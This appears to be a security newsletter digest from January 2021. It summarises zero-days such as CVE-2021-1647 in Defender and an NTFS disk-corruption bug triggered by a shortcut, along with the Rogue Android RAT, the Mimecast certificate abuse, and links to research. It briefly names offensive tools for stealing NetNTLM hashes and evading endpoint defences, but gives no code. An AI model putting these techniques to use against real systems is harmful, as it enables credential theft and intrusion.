There is one or more zero-day in each vulnerability section. Intel takes care of the threat from ransomware, the attacker gained access to Microsoft accounts, and, as usual, a little bit about the most interesting new malware with the highest impact.
- Vulnerabilities: Mostly zero-days;
- Tools: Outlook research + new tool, OSINT, web testing and defense evasion;
- News: Intel against ransomware, new malware and abused;
- Research: Not much but very useful.
Really short feedback -> here
Microsoft releases Windows updates to patch a total of 83 newly discovered security flaws, including an actively exploited zero-day RCE vulnerability affecting Defender application.
CVE-2021-1647 was in the Malware Protection component. According to reports, it was actively used in the wild. Microsoft does not provide technical details on the vulnerability. If you are using Microsoft Defender – update urgently
The Google Project Zero team begun to publish materials in the “In the Wild” series, in which it talks about its new program to identify the exploitation of 0-day vulnerabilities.
As part of a series of six articles, the researchers talk about a cyber campaign discovered by this program in the first quarter of 2020 to infect Windows and Android users through an attack on a watering hole.
The Google Project Zero team produces incredible posts frequently. Therefore, you can subscribe to them through our subscriptions as follows:
Security researcher Jonas L focus on an unpatched NTFS vulnerability affecting Windows 10. According to the expert, the vulnerability appeared in Windows 10 (build 1803) and continues to exist in the latest version.
The vulnerability lies in the incorrect handling of one of the NTFS attributes, an attempt to access which instantly corrupts the hard drive. The most interesting thing is that the malicious command can be hidden in a Windows shortcut, which doesn’t even need to be opened. The vulnerability is triggered by simply opening a folder containing this shortcut. The exploitation methods are numerous, including remote ones.
Collecting materials for each new post, we find the most interesting and non-standard tools. Check out the release of a new tool that helps stealing NetNTLM Hashes via Outlook Signatures:
Collect OSINT for GitLab groups and members and search the group and group members’ snippets , issues , and issue discussions for sensitive data that may be included in these assets.
A cli for cracking, testing vulnerabilities on Json Web Token (JWT).
It helps with evasion by generating header/ASM files implants can use to make direct system calls.
Experts have discovered a new remote access Trojan for Android Check Point researchers found that a malware developer known as Triangulum has teamed up with a certain HeXaGoN Dev to release a new malware called Rogue. Malware for Android is capable of intercepting control of victims’ devices and stealing data, including photos, geolocation data, contacts and messages. The new combination of two old malware is up for sale on hack forums for just $ 29.99 a month or $ 189.99 indefinitely.
Attackers abused Mimecast’s certificate to access Microsoft 365 accounts. Mimecast, which develops cloud-based email management products, warned its customers that an unknown hacker had one of its digital certificates in his possession. The attacker abused it to gain access to some Microsoft 365 customer accounts.
A law enforcement and third-party cyber forensics team is currently investigating the incident.
Intel: the next generation of Core vPro processors will receive protection from ransomware at the hardware level. At CES, which is taking place online this year, Intel announced 11th Gen Core vPro processors with Hardware Shield and Threat Detection Technology (TDT) capabilities to detect ransomware attacks at the hardware level.
macOS Post-Exploitation Shenanigans with VSCode Extensions: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions
The best security conferences of 2021: https://techbeacon.com/security/best-security-conferences-2021
- Obfuscated DNS Queries https://isc.sans.edu/diary/rss/26992
- Detecting Mylibot, Unseen DGA Based Malware https://blogs.akamai.com/sitr/2021/01/detecting-mylobot-unseen-dga-based-malware-using-deep-learning.html
- Advanced Emotet Updates https://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates
Sailing Past Security Measures In AD: https://luemmelsec.github.io/Circumventing-Countermeasures-In-AD
Really short feedback -> here